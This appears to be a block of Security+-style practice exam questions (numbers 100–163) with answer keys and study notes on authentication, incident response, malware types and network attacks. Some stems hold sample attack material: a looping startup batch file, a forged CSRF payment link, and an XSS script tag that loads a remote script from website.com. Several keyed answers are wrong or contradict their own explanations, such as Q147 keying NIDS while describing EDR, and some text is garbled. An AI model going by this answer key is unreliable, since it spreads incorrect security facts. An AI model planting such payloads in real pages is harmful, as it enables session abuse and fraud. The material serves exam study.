An organization discovers that unauthorized applications have been installed on company-provided mobile phones. The organization issues these devices, but some users have managed to bypass the security controls. Which of the following is the MOST likely issue, and how can the organization BEST prevent this from happening?

A. The mobile phones are being infected with malware that covertly installs the applications. 
Implement full disk encryption and integrity-checking software.
B. Some advanced users are jailbreaking the OS and bypassing the controls. 
Implement an MDM solution to control access to company resources.
C. The mobile phones have been compromised by an APT and can no longer be trusted. 
Scan the devices for the unauthorized software, recall any compromised devices, and issue completely new ones.
D. Some advanced users are upgrading the devices' OS and installing the applications. 
The organization should create an AUP that prohibits this activity.

Answer: B

END
QUESTION 101
Which of the following is a valid multifactor authentication combination?

A. OTP token combined with password 
B. Strong password and PIN combination 
C. OTP token plus smart card
D. Presence detecting facial recognition

Answer: A

END
QUESTION 102
A security analyst is investigating a call from a user regarding one of the websites receiving a 503: Service Unavailableerror. The analyst runs a netstat-ancommand to discover if the web server is up and listening. The analyst receives the following output:

TCP 10.1.5.2:80 192.168.2.112:60973 	TIME_WAIT TCP 	10.1.5.2:80
192.168.2.112:60974 					TIME_WAIT TCP 	10.1.5.2:80
192.168.2.112:60975 					TIME_WAIT TCP 	10.1.5.2:80
192.168.2.112:60976 					TIME_WAIT TCP 	10.1.5.2:80
192.168.2.112:60977 					TIME_WAIT TCP 	10.1.5.2:80
192.168.2.112:60978 					TIME_WAIT

Which of the following types of attack is the analyst seeing?

A. Buffer overflow 
B. Domain hijacking 
C. Denial of service 
D. ARP poisoning

Answer: C

END
QUESTION 103
Which of the following serves to warn users against downloading and installing pirated software on company devices?

A. AUP 
B. NDA 
C. ISA 
D. BPA

Answer: A

END
QUESTION 104
An employee opens a web browser and types a URL into the address bar. Instead of reaching the requested site, the browser opens a completely different site. Which of the following types of attacks have MOST likely occurred? (Select TWO).

A. DNS hijacking
B. Cross-site scripting 
C. Domain hijacking
D. Man-in-the-browser 
E. Session hijacking

Answer: AD

DNS hijacking, DNS poisoning, or DNS redirection is the practice of subverting the resolution of Domain Name System (DNS) queries. This can be achieved by malware that overrides a computer's TCP/IP configuration to point at a rogue DNS server under the control of an attacker, or through modifying the behavior of a trusted DNS server so that it does not comply with internet standards.

A Man-in-the-browser (MitB) attack is a specific type of on-path attack where the web browser is compromised. 
Depending on the level of privilege obtained, the attacker may be able to inspect session cookies, certificates, and data, 
change browser settings, perform redirection, and inject code.

END
QUESTION 105
A company is experiencing an increasing number of systems that are locking up on Windows startup. The security analyst clones a machine, enters into safe mode, and discovers a file in the startup process that runs Wstart.bat.

@echo off :asdhbawdhbasdhbawdhb 
start notepad.exe 
start notepad.exe 
start calculator.exe 
start calculator.exe
goto asdhbawdhbasdhbawdhb

Given the file contents and the system's issues, which of the following types of malware is present?

A. Rootkit
B. Logic bomb 
C. Worm
D. Virus

Answer: B

END
QUESTION 106
Which of the following attacks can be mitigated by proper data retention policies?

A. Dumpster diving
B. Man-in-the-browser 
C. Spear phishing
D. Watering hole

Answer: A

The data retention policies within an organization are a set of guidelines that describes which data will be archived, how long it will be kept, what happens to the data at the end of the retention period (archive or destroy) and other factors concerning the retention of the data.

END
QUESTION 107
A company employee recently retired, and there was a schedule delay because no one was capable to fill the employee's position. Which of the following practices would BEST help to prevent this situation in the future?

A. Mandatory vacation 
B. Separation of duties 
C. Job rotation
D. Exit interviews

Answer: C

END
QUESTION 108
During a security audit of a company's network, unsecure protocols were found to be in use.
A network administrator wants to ensure browser-based access to company switches is using the most secure protocol. Which of the following protocols should be implemented?

A. SSH2 
B. TLS1.2 
C. SSL1.3
D. SNMPv3

Answer: B

END
QUESTION 109
A healthcare company is revamping its IT strategy due to recent regulations. The company is concerned about compliance and wants to use a pay-per-use model. Which of the following is the BEST solution?

A. On-premises hosting 
B. Community cloud
C. Hosted infrastructure 
D. Public SaaS

Answer: D

END
QUESTION 110
Which of the following represents a multifactor authentication system?

A. An iris scanner coupled with a palm print reader and fingerprint scanner with liveness detection 
B. A secret passcode that prompts the user to enter a secret key if entered correctly
C. A digital certificate on a physical token that is unlocked with a secret passcode 
D. A one-time password token combined with a proximity badge

Answer: C

END
QUESTION 111
A preventive control differs from a compensating control in that a preventive control is:

A. put in place to mitigate a weakness in a user control.
B. deployed to supplement an existing control that is EOL. 
C. relied on to address gaps in the existing control structure. 
D. designed to specifically mitigate a risk.

compensating control - A security measure that takes on risk mitigation when a primary control fails or cannot completely meet expectations.

Answer: D

END
QUESTION 112
The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead to:

0A. arbitrary code execution. 
B. resource exhaustion.
C. exposure of authentication credentials. 
D. dereferencing of memory pointers.

Answer: A

DEP/NX Protection - Win32 apps | Microsoft Docs

END
QUESTION 113
The president of a company that specializes in military contracts receives a request for an interview. During the interview, the reporter seems more interested in discussing the president's family life and personal history than the details of a recent company success. Which of the following security concerns is this MOST likely an example of?

A. Insider threat
B. Social engineering
C. Passive reconnaissance 
D. Phishing

Answer: B

END
QUESTION 114
Which of the following is an example of federated access management?

A. Windows passing user credentials on a peer-to-peer network 
B. Applying a new user account with a complex password
C. Implementing an IAM framework for network access
D. Using a popular website login to provide access to another website

Answer: D

OAuth (Open Authorization) Standard for federated identity management, allowing resource servers or consumer
sites to work with user accounts created and managed on a separate identity provider.

END
QUESTION 115
A company network is currently under attack. Although security controls are in place to stop the attack, the security administrator needs more information about the types of attacks being used. Which of the following network types would BEST help the administrator gather this information?

A. DMZ
B. Guest network 
C. Ad hoc
D. Honeynet

Answer: D

END
QUESTION 116
An organization's policy requires users to create passwords with an uppercase letter, lowercase letter, number, and symbol. This policy is enforced with technical controls, which also prevents users from using any of their previous 12 passwords. The organization does not use single sign-on, nor does it centralize storage of passwords.

The incident response team recently discovered that passwords for one system were compromised. 
Passwords for a completely separate system have NOT been compromised, but unusual login activity has been 
detected to that separate system. Account login has been detected for users who are on vacation.

Which of the following BEST describes what is happening?

A. Some users are meeting password complexity requirements but not password length requirements.
B. The password history enforcement is insufficient, and old passwords are still valid across many different systems.
C. Some users are reusing passwords, and some of the compromised passwords are valid on multiple systems. '
D. The compromised password file has been brute-force hacked, and the complexity requirements are not adequate to mitigate this risk.

Answer: C

END
QUESTION 117
A company recently implemented a new security system. In the course of configuration, the security administrator adds the following entry:

#Whitelist USB\VID13FE&PID_4127&REV_0100

Which of the following security technologies is MOST likely being configured?

A. Application whitelisting 
B. HIDS
C. Data execution prevention 
D. Removable media control

Answer: D

END
QUESTION 118
A nuclear plant was the victim of a recent attack, and all the networks were air gapped. A subsequent investigation revealed a worm as the source of the issue. Which of the following BEST explains what happened?

A. A malicious USB was introduced by an unsuspecting employee.
B. The ICS firmware was outdated
C. A local machine has a RAT installed.
D. The HVAC was connected to the maintenance vendor.

Answer: A

ICS - Industrial Control Systems
ICS – Internet Connection Sharing
ICS – Android Ice Cream Sandwich

END
QUESTION 119
Which of the following job roles would sponsor data quality and data entry initiatives that ensure business and regulatory requirements are met?

A. The data owner
B. The data processor
C. The data steward
D. The data privacy officer.

Answer: C

> Data owner - a senior (executive) role with ultimate responsibility for maintaining the confidentiality, integrity, and availability of the information asset. The owner is responsible for labeling the asset (such as determining who should have access and
determining the asset's criticality and sensitivity) and ensuring that it is protected with appropriate controls (access control, backup, retention, and so forth). The owner also typically selects a steward and custodian and directs their actions and
sets the budget and resource allocation for sufficient controls.

> Data steward - this role is primarily responsible for data quality. This involves tasks such as ensuring data is labeled and identified with appropriate metadata and that data is collected and stored in a format and with values that comply with applicable
laws and regulations.

> Data custodian - this role handles managing the system on which the data assets are stored. This includes responsibility for enforcing access control, encryption, and backup/recovery measures.

> Data Privacy Officer (DPO) - this role is responsible for oversight of any personally identifiable information (PII) assets managed by the company. The privacy officer ensures that the processing, disclosure, and retention of PII complies 
with legal and regulatory frameworks.

Data controller - the entity responsible for determining why and how data is stored, collected, and used and for ensuring that these purposes and means are lawful. The data controller has ultimate responsibility for privacy breaches, and is
not permitted to transfer that responsibility.

Data processor - an entity engaged by the data controller to assist with technical collection, storage, or analysis tasks. 
A data processor follows the instructions of a data controller with regard to collection or processing.

END
QUESTION 120
Which of the following technical controls is BEST suited for the detection and prevention of buffer overflows on hosts?

A. DLP
B. HIDS
C. EDR
D. NIPS

Answer: C

EDR (endpoint detection and response) - A software agent that collects system data and logs for analysis by a monitoring
system to provide early detection of threats.

An endpoint detection and response (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.

From the CompTia Book

You are providing security advice and training to a customer's technical team. One asks how they can identify when a buffer overflow occurs. What is your answer?

Real-time detection of a buffer overflow is difficult, and is typically only achieved by security monitoring software (antivirus, endpoint detection and response, or user and entity behavior analytics) or by observing the host closely within a sandbox. An
unsuccessful attempt is likely to cause the process to crash with an error message. If the attempt is successful, the process is likely to show anomalous behavior, such as starting another process, opening network connections, or writing to AutoRun keys in
the registry. These indicators can be recorded using logging and system monitoring tools.

END
QUESTION 121
A security analyst needs to be proactive in understanding the types of attacks that could potentially target the company's executables. Which of the following intelligence sources should the security analyst review?

A. Vulnerability feeds
B. Trusted automated exchange of indicator information
C. Structured threat information expression
D. Industry information-sharing and collaboration groups

Answer: A

Vulnerability Feeds - As well as analyzing adversary tools and behaviors, another source of threat intelligence is identifying vulnerabilities in OS, software application, and firmware code. Security researchers look for vulnerabilities, often for the reward of bug bounties offered by the vendor. Lists of vulnerabilities are stored in databases such as Common Vulnerabilities and Exposures (CVE), operated by Mitre (cve.mitre.org). Information about vulnerabilities is codified as signatures and scanning scripts that can be supplied as feeds to automated vulnerability scanning software.

TAXII (Trusted Automated eXchange of Indicator Information) A protocol for supplying codified information to automate incident detection and analysis.

STIX (Structured Threat Information eXpression) A framework for analyzing cybersecurity incidents.

END
QUESTION 122
A security analyst is using a recently released security advisory to review historical logs, looking for the specific activity that was outlined in the advisory. Which of the following is the analyst doing?

A. A packet capture
B. A user behavior analysis
C. Threat hunting
D. Credentialed vulnerability scanning

Answer: C

TTP (tactics, techniques, and procedures) Analysis of historical cyberattacks and adversary actions.

Threat Hunting - Where vulnerability scanning uses lists of patches and standard definitions of baseline configurations, threat hunting is an assessment technique that utilizes insights gained from threat intelligence to proactively discover whether there is evidence of TTPs already present within the network or system. This contrasts with a reactive process that is only triggered when alert conditions are reported through an incident management system. You can also contrast threat hunting with penetration testing. Where a pen test attempts to achieve some sort of system intrusion or concrete demonstration of weakness, threat hunting is based only on analysis of data within the system. To that extent, it is less potentially disruptive than pen testing.

END
QUESTION 123
An organization suffered an outage and a critical system took 90 minutes to come back online. Though there was no data loss during the outage, the expectation was that the critical system would be available again within 60 minutes.
Which of the following is the 60-minute expectation an example of:

A. MTBF
B. RPO
C. MTTR
D. RTO

Answer: D

MTTR (mean time to repair/replace/recover) The average time taken for a device or component to be repaired, replaced, or otherwise recover from a failure.

RTO (recovery time objective) The length of time it takes after an event to resume normal business operations and activities.

END
QUESTION 124
A security analyst is preparing a threat for an upcoming internal penetration test. The analyst needs to identify a method for determining the tactics, techniques, and procedures of a threat against the organization's network. Which of the following will the analyst MOST likely use to accomplish the objective?

A. A table exercise
B. NST CSF
C. MITRE ATT&CK
D. OWASP

Answer: C

MITRE ATT&CK - As an alternative to the life cycle analysis implied by a kill chain, the MITRE Corporation's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK) matrices provide access to a database of known TTPs. This freely available resource (attack.mitre.org) tags each technique with a unique ID and places it in one or more tactic categories, such as initial access, persistence, lateral movement, or command and control. The sequence in which attackers may deploy any given tactic category is not made explicit. This means analysts must interpret each attack life cycle from local evidence. The framework makes TTPs used by different adversary groups directly comparable, without assuming how any particular adversary will run a campaign at a strategic level.

TTP (tactics, techniques, and procedures) Analysis of historical cyberattacks and adversary actions.

END
QUESTION 125
A company uses wireless for all laptops and keeps a very detailed record of its assets, along with a comprehensive list of devices that are authorized to be on the wireless network. The Chief Information Officer (CIO) is concerned about a script kiddie potentially using an unauthorized device to brute force the wireless PSK and obtain access to the internal network. Which of the following should the company implement to BEST prevent this from occurring?

A. A BPDU guard
B. WPA2-EAP
C. IP filtering
D. A WIDS

Answer: B

WPA-EAP (WPA Extensible Authentication Protocol) − It was developed for enterprise or business networks and requires a Remote Authentication Dial-In User Service (RADIUS) authentication server. It requires a complicated setup and provides automatic key generation and additional security measures. It uses various Extensible Authentication Protocol (EAP) for authenticating various categories of network users.

BPDU guard (Bridge Protocol Data Unit guard) Switch port security feature that disables the port if it receives BPDU
notifications related to spanning tree. This is configured on access ports where there any BPDU frames are likely to be
malicious.
A wireless intrusion detection system (WIDS) monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected.

END
QUESTION 126
In the middle of a cybersecurity attack, a security engineer removes the infected devices from the network and locks down all compromised accounts. In which of the following incident response phases is the security engineer currently operating?

A. Identification
B. Preparation
C. Eradication
D. Recovery
E. Containment

Answer: E

Incident Response Steps – Identification, Containment, Eradication, Recovery, and Lessons Learned.

END
QUESTION 127
A technician needs to prevent data loss in a laboratory. The laboratory is not connected to any external networks. Which of the following methods would BEST prevent data loss? (Select TWO)

A. VPN
B. Drive encryption
C. Network firewall
D. File-level encryption
E. USB blocker
F. MFA 

Answer: DE

END
QUESTION 128
Employees are having issues accessing the company's website. Some employees report very slow performance, while others cannot access the website at all. The web and security administrators search the logs and find millions of half-open connections to port 443 on the web server. Further analysis reveals thousands of different source IPs initiating this traffic. 
Which of the following attacks is MOST likely occurring?

A. DDoS
B. Man-in-the-middle
C. MAC flooding
D. Domain hijacking

Answer: A

END
QUESTION 129
An organization hired a consultant to assist with an active attack, and the consultant was able to identify the compromised accounts and computers. Which of the following is the consultant MOST likely to recommend to prepare for eradication?

A. Quarantining the compromised accounts and computers, only providing them with network access
B. Segmenting the compromised accounts and computers into a honeynet to not alert the attackers.
C. Isolating the compromised accounts and computers, cutting off all network and internet access.
D. Logging off and deleting the compromised accounts and computers to eliminate attacker access.

Answer: C

END
QUESTION 130
Local guidelines require that all information systems meet a minimum-security baseline to be compliant. Which of the following can security administrators use to assess their system configurations against the baseline?

A. SOAR playbook
B. Security control matrix
C. Risk management framework
D. Benchmarks

Answer: D

SOAR (security orchestration, automation, and response) - A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment.

A Security control matrix allows a security manager to describe intended security strategy outcomes and how they're met, or not met, by existing or proposed controls. In this example, the controls are listed down the left column with administrative, physical, and technical controls represented by columns. The aggregate column is your team's assessment of how well the controls meet control feature requirements overall. 

Benchmarks and Secure Configuration Guides - Although a framework gives a "high-level" view of how to plan IT services, it does not generally provide detailed implementation guidance. At a system level, the deployment of servers and applications is covered by benchmarks and secure configuration guides. The Center for Internet Security (CIS) also produces benchmarks for different aspects of cybersecurity. For example, there are benchmarks for compliance with IT frameworks and compliance programs, such as PCI DSS, NIST 800-53, SOX, and ISO 27000. There are also product-focused benchmarks, such as for Windows Desktop, Windows Server, macOS, Linux, Cisco, web browsers, web servers, database and email servers, and VMware ESXi. The CIS-CAT (Configuration Access Tool) can be used with automated vulnerability scanners to test compliance against these benchmarks (cisecurity.org/cybersecurity-tools/cis-cat-pro/cis-cat-faq).

END
QUESTION 131
A security audit has revealed that a process control terminal is vulnerable to malicious users installing and executing software on the system. The terminal is beyond end-of-life support and cannot be upgraded, so it is placed on a protected network segment. Which of the following would be MOST effective to implement to further mitigate the reported vulnerability?

A. DNS sinkhole
B. DLP rules on the terminal
C. An IP blacklist
D. Application whitelisting

Answer: D

A DNS sinkhole, also known as a sinkhole server, Internet sinkhole, or Blackhole DNS is a DNS server that gives out a false result for a domain name.

END
QUESTION 132
Which of the following is a team of people dedicated to testing the effectiveness of organizational security programs by emulating the techniques of potential attackers?

A. Red team
B. White team
C. Blue team
D. Purple team

Answer: A

Some of the techniques used in penetration testing may also be employed as an
exercise between two competing teams:

> Red team - performs the offensive role to try to infiltrate the target.
> Blue team - performs the defensive role by operating monitoring and alerting
controls to detect and prevent the infiltration.

Purple Team Cybersecurity | SANS Institute

Why a Purple Team? Although they share a common goal, blue and red teams are often not well-aligned, which leads to organizations not leveraging the full value of their team expertise. They typically report to a as a "third" team; think of it as a concept aimed at bringing the red and blue teams together to create purple team exercises.

The White Team helps to establish the rules of engagement, the metrics for assessing results and the procedures for providing operational security for the engagement. The White Team normally has responsibility for deriving lessons-learned, conducting the post engagement assessment, and promulgating results.

END
QUESTION 133
A security assessment determines DES and 3DES at still being used on recently deployed production servers. Which of the following did the assessment identify?

A. Unsecure protocols
B. Default settings
C. Open permissions
D. Weak encryption		

Answer: D

END
QUESTION 134
After entering a username and password, an administrator must gesture on a touch screen. Which of the
following demonstrates what the administrator is providing?

A. Multifactor authentication
B. Something you do
C. Biometric
D. Two-factor authentication

Answer: B

END
QUESTION 135
The SOC is reviewing process and procedures after a recent incident. The review indicates it took more than 30 minutes to determine that quarantining an infected host was the best course of action. This allowed the malware to spread to additional 
hosts before it was contained. Which of the following would be BEST to improve the incident response process?

A. Updating the playbooks with better decision points
B. Dividing the network into trusted and untrusted zones
C. Providing additional end-user training on acceptable use
D. Implementing manual quarantining of infected hosts

Answer: A

Guidelines for Performing Incident Response
Follow these guidelines for developing or improving incident response policies and procedures:

> Identify goals for implementing structured incident response, following the preparation, identification, containment, eradication, recovery, and lessons learned steps.

> Prepare for effective incident response by creating a CIRT/CERT/CSIRT with suitable communications resources and policies.

> Develop an incident classification system and prepare IRPs and playbooks for distinct incident scenarios, using attack frameworks (kill chain, Diamond Model, and MITRE ATT&CK) to facilitate analysis.

END
QUESTION 136
A financial analyst is expecting an email containing sensitive information from a client. When the email arrives, the analyst receives an error and is unable to open the encrypted message. Which of the following is the MOST likely cause of the issue?

A. The S/MIME plug-in is not enabled.
B. The SSL certificate has expired.
C. Secure IMAP was not implemented
D. POP3S is not supported.

Answer: A

S/MIME (Secure/Multipurpose Internet Mail Extensions) An email encryption standard that adds digital signatures and
public key cryptography to traditional MIME communications.

END
QUESTION 137
A security analyst is reviewing the following attack log output:

user comptia\john.smith attempted login with the password password123
user comptia\jane.doe attempted login with the password password123
user comptia\user.one attempted login with the password password123
user comptia\user.two attempted login with the password password123
user comptia\user.three attempted login with the password password123

user comptia\john.smith attempted login with the password password234
user comptia\jane.doe attempted login with the password password234
user comptia\user.one attempted login with the password password234
user comptia\user.two attempted login with the password password234
user comptia\user.three attempted login with the password password234
 
Which of the following types of attacks does this MOST likely represent?

A. Rainbow table
B. Brute-force
C. Password-spraying
D. Dictionary

Answer: C

Password spraying is a horizontal brute-force online attack. This means that the attacker chooses one or more common passwords (for example, password or 123456) and tries them in conjunction with multiple usernames.

END
QUESTION 138
A company's Chief Information Officer (CIO) is meeting with the Chief Information Security Officer (CISO) to plan some activities to enhance the skill levels of the company's developers. Which of the following would be MOST suitable for training the developers'?

A. A capture-the-flag competition
B. A phishing simulation
C. Physical security training
D. Baste awareness training

Answer: A

There are usually two different types of Capture The Flag events. The two most common types are:

Red Team/Blue Team
In this style of event the red team attempts to capture flags while the blue team attempts to defend the various flags from being captured.

Red Team
This style of event usually involves one or more people, working alone or on a team, who attempt to capture various flags while there is no team defending them.

Each type of event has various pros and cons. In a Red Team vs. Blue Team scenario, the attackers learn vital techniques while the defenders have a chance to learn how to defend their systems from an active attack. In a Red Team scenario, however, everyone gangs up on the poor CTF host and does their best to have it divulge every flag the attackers can get their digital claws on.

END
QUESTION 139
A user recently received an SMS on a mobile phone that asked for bank details. 
Which of the following social-engineering techniques was used in this case?

A. SPIM
B. Vishing
C. Spear phishing
D. Smishing

Answer: D

SMiShing - A form of phishing that uses SMS text messages to trick a victim into revealing information.

END
QUESTION 140
Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company's final software releases? (Select TWO.)

A. Unsecure protocols
B. Use of penetration-testing utilities
C. Weak passwords
D. Included third-party libraries
E. Vendors/supply chain
F. Outdated anti-malware software

Answer: DE

END
QUESTION 141
A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to the phishing team, and the forwarded email revealed the link to be:
 
<a href="https://www.company.com/payto.do?routing=00001111&acct=2223334&amount=250">Click her to unsubscribe</a>

Which of the following will the forensics investigator MOST likely determine has occurred?

A. SQL injection
B. CSRF
C. XSS
D. XSRF

Answer: D

END
QUESTION 142
A worldwide manufacturing company has been experiencing email accounts being compromised. In one incident, 
a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would BEST prevent this type of attack?

A. Network location
B. Impossible travel time
C. Geolocation
D. Geofencing

Answer: B

An impossible travel time/risky login policy tracks the location of login events over time. If these do not meet a threshold, the account will be disabled. For example, a user logs in to an account from a device in New York. A couple of hours later, a login
attempt is made from LA, but this is refused and an alert raised because it is not feasible for the user to be in both locations.

END
QUESTION 143 
A security analyst needs to generate a server certificate to be used for 802.1X and secure RDP connections. The analyst is unsure what is required to perform the task and solicits help from a senior colleague. Which of the following is the FIRST step the senior colleague will most likely tell the analyst to perform to accomplish this task?

A. Create an OCSP
B. Generate a CSR
C. Create a CRL
D. Generate a .pfx file

Answer: B

END
QUESTION 144
A user recently attended an exposition and received some digital promotional materials. The user later noticed blue boxes popping up and disappearing on the computer, and reported receiving several spam emails, which the user did not open.
Which of the following is MOST likely the cause of the reported issue?

A. There was a drive-by download of malware
B. The user installed a cryptominer
C. The OS was corrupted
D. There was malicious code on the USB drive

Answer: D

END
QUESTION 145
An analyst visits an internet forum looking for information about a tool. The analyst finds a threat that appears to contain relevant information. One of the posts says the following:

Hello everyone,
I am having the same problem with my server. Can you help me?

<script type="text/javascript" arc=http://website.com/user.js>
onload=sqlexec();
</script>

Thank you,
Joe

Which of the following BEST describes the attack that was attempted against the forum readers?

A. SOU attack
B. DLL attack
C. XSS attack
D. API attack

Answer: C

END
QUESTION 146
A network administrator has been asked to design a solution to improve a company's security posture. 
The administrator is given the following, requirements?

> The solution must be inline in the network
> The solution must be able to block known malicious traffic
> The solution must be able to stop network-based attacks

Which of the following should the network administrator implement to BEST meet these requirements?

A. HIDS
B. NIDS
C. HIPS
D. NIPS

Answer: D

END
QUESTION 147
A recent malware outbreak across a subnet included successful rootkit installations on many PCs, ensuring persistence by rendering remediation efforts ineffective. Which of the following would BEST detect the presence of a rootkit in the future?

A. FDE
B. NIDS
C. EDR
D. DLP

Answer: B

EDR (endpoint detection and response) - A software agent that collects system data and logs for analysis by a monitoring
system to provide early detection of threats.

An (EDR) product's aim is not to prevent initial execution, but to provide real-time and historical visibility into the compromise, contain the malware within a single host, and facilitate remediation of the host to its original state.

END
QUESTION 148
A company recently experienced a data breach and the source was determined to be an executive who was charging 
a phone in a public area. Which of the following would MOST likely have prevented this breach?

A. A firewall
B. A device pin
C. A USB data blocker
D. Biometrics

Answer: C

Malicious USB charging cables and plugs are also a widespread problem. As with card skimming, a device may be placed over a public charging port at airports and other transit locations. A USB data blocker can provide mitigation against these juice-jacking
attacks by preventing any sort of data transfer when the smartphone or laptop is connected to a charge point.

zdnet.com/article/this-cheap-gadget-can-stop-yoursmartphone-or-tablet-being-hacked-at-an-airport-hotel-or-café

END
QUESTION 149
A security analyst is performing a packet capture on a series of SOAP HTTP requests for a security assessment. The analyst redirects the output to a file. After the capture is complete, the analyst needs to review the first transactions quickly and then search the entire series of requests for a particular string. Which of the following would be BEST to use to accomplish the task? (Select TWO).

A. head
B. Tcpdump
C. grep
D. rail
E. curl
F. openssl
G. dd

Answer: AC

head command - Linux utility for showing the first lines in a file.

grep command - Linux command for searching and filtering input. 
This can be used as a file search tool when combined with ls.

In a rail fence cipher, letters are not changed, but only switched around regarding their positioning in the message. This type of cipher is often called a transposition cipher, because letters are simply transposed in terms of their placement.

curl command Utility for command-line manipulation of URL-based protocol requests.

OpenSSL offers cryptographic functions to support SSL/TLS protocols. In SSL security, websites use digital certificates to prove their legitimacy. OpenSSL is written in the C programming language and relies on different ciphers and algorithms to provide encryption. The product is dual licensed under an Apache license and a Berkeley Software Distribution license.
dd command Linux command that makes a bit-by-bit copy of an input file, typically used for disk imaging.

END
QUESTION 150
Users have been issued smart cards that provide physical access to a building. The cards also contain tokens that can be used to access information systems. Users can log in to any thin client located throughout the building and see the same desktop each time. Which of the following technologies are being utilized to provide these capabilities? (Select TWO)

A. COPE 
B. VDI
C. GPS
D. TOTP
E. RFID
F. BYOD

Answer: BE

VDI (virtual desktop infrastructure) A virtualization implementation that separates the personal computing environment from a user's physical computer.
TOTP (Time-based One-time Password) An improvement on HOTP that forces one-time passwords to expire after a short period of time.

HOTP (HMAC-based One-time Password) An algorithm that generates a one-time password using a hash-based
authentication code to verify the authenticity of the message.

BYOD – Bring your own device - Employee owned
CYOD – Choose your own device - Employee or Corporate owned, you choose from several models
COPE – Corporate owned personally enabled - May or may not have a choice of models

END
QUESTION 151
A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Select TWO).

A. Full-device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application whitelisting
F. Remote control

Answer: AD

END
QUESTION 152
A security engineer is reviewing log files after a third of the company's usernames and passwords were discovered for the organization's accounts. The engineer sees there was a change in the IP address for a vendor website one day earlier. 
This change lasted eight hours. Which of the following attacks was MOST likely used?

A. Man-in- the middle
B. Spear-phishing
C. Evil twin
D. DNS poisoning

Answer: D

END
QUESTION 153
A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages to gain access to them. Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall.

Answer: A

END
QUESTION 154
The following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training
B. Frequency of NIDS updates
C. Change control procedures
D. EDR reporting cycle

Answer: A

END
QUESTION 155
The Chief Security Officer (CSO) at a major hospital wants to implement SSO to help improve in the environment patient data, particularly at shared terminals. The Chief Risk Officer (CRO) is concerned that training and guidance has been provided to frontline staff, and a risk analysis has not been performed. Which of the following is the MOST likely cause of the CRO's concerns?

A. SSO would simplify username and password management, making it easier for hackers to guess the password of accounts.
B. SSO would reduce password fatigue, but staff would still need to remember more complex passwords.
C. SSO would reduce the password complexity for frontline staff.
D. SSO would reduce the resilience and availability of systems if the provider goes offline.

Answer: D

END
QUESTION 156
A network administrator is setting up wireless access points in all the conference rooms and wants to authenticate a device using PKI. Which of the following should the administrator configure?

A. A captive portal
B. PSK
C. 802.1X
D. WPS

Answer: C

END
QUESTION 157
A security analyst needs to complete an assessment. The analyst is logged into a server and must use native tools to map services running on it to the server's listening ports. Which of the following tools can BEST accomplish this talk?

A. Netcat
B. Netstat
C. Nmap
D. Nessus

Answer: B

Nmap Versatile port scanner used for topology, host, service, and OS discovery and enumeration.

END
QUESTION 158
A security engineer needs to enhance MFA access to sensitive areas in a building. A key card and fingerprint scan are already in use. Which of the following would add another factor of authentication?

A. Hard token
B. Retina scan
C. SMS text
D. Keypad PIN

Answer: D

END
QUESTION 159
A security analyst receives the configuration of a current VPN profile and notices the authentication is only applied to the IP datagram portion of the packet. Which of the following should the analyst implement to authenticate the entire packet?

A. AH
B. ESP
C. SRTP
D. LDAP

Answer: B

END
QUESTION 160
A vulnerability assessment report will include the CVSS score of the discovered vulnerabilities because the score allows the organization to better.

A. validate the vulnerability exists in the organization's network through penetration testing
B. research the appropriate mitigation techniques in a vulnerability database
C. find the software patches that are required to mitigate a vulnerability
D. prioritize remediation of vulnerabilities based on the possible impact.

Answer: D

CVSS (Common Vulnerability Scoring System) A risk management approach to quantifying vulnerability data and then
taking into account the degree of risk to different types of systems or information

END
QUESTION 161
Joe, a user at a company, clicked an email link that led to a website that infected his workstation. Joe was connected to the network, and the virus spread to the network shares. The protective measures failed to stop this virus, and it has continued to evade detection. Which of the following should the administrator implement to protect the environment from this malware?

A. Install a definition-based antivirus.
B. Implement an IDS/IPS
C. Implement a heuristic behavior-detection solution.
D. Implement CASB to protect the network shares.

Answer: C

heuristic analysis (heuristic) A method that uses feature comparisons and likenesses rather than specific signature
matching to identify whether the target of observation is malicious.

END
QUESTION 162
Which of the following allows for functional test data to be used in new systems for testing and training purposes 
to protect the real data?

A. Data encryption
B. Data masking
C. Data deduplication
D. Data minimization

Answer: B

Data masking can mean that all or part of the contents of a field are redacted, by substituting all character strings with "x" for example. A field might be partially redacted to preserve metadata for analysis purposes. For example, in a telephone number, 
the dialing prefix might be retained, but the subscriber number redacted. Data masking can also use techniques to preserve the original format of the field.

Data minimization is a principle requiring organizations to limit the data they collect and use.

END
QUESTION 163
An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has only been given the documentation available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty
B. Black-box
C. Gray-box
D. White-box

Answer: C

> Black box (or unknown environment) - the consultant is given no privileged information about the network and its security systems. This type of test would require the tester to perform a reconnaissance phase. Black box tests are useful for simulating the behavior of an external threat.

> White box (or known environment) - the consultant is given complete access to information about the network. This type of test is sometimes conducted as a follow-up to a black box test to fully evaluate flaws discovered during the black box test. The tester skips the reconnaissance phase in this type of test. White box tests are useful for simulating the behavior of a privileged insider threat.

